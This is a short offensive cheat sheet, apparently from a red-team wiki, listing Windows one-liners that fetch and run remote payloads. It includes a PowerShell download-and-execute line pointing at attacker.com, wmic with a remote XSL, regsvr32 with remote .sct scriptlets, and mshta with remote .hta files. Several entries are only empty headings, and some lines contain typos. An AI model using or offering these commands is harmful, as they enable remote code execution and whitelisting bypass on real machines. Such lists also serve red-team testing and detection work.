One Liners
Powershell:
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://attacker.com/payload.txt')|iex"WMI:
wmic os get /format:https://evil/payload.xsl”Regsvr32:
regsvr32 /u /n /s /i:http://evil/payload.sct scrobj.dll
regsvr32.exe /s /n /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
Execute the specified remote .SCT script with scrobj.dll
regsvr32.exe /s /u /i:file.sct scrobj.dll
Execute the specified local .SCT script with scrobj.dll.
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
MSHTA
mshta vbscript:Execute(“GetObject(“”scirpt:Http://evil/file.sct””)”)
mshta.exe http://<ip>/payload.hta
mshta.exe https://malicious.domain/runme.htaCscript:
BITSADMIN:
MSbuild:
RunDll32
obcdconf(dll renamed to txt)
pubprn.vbs
Last updated
Was this helpful?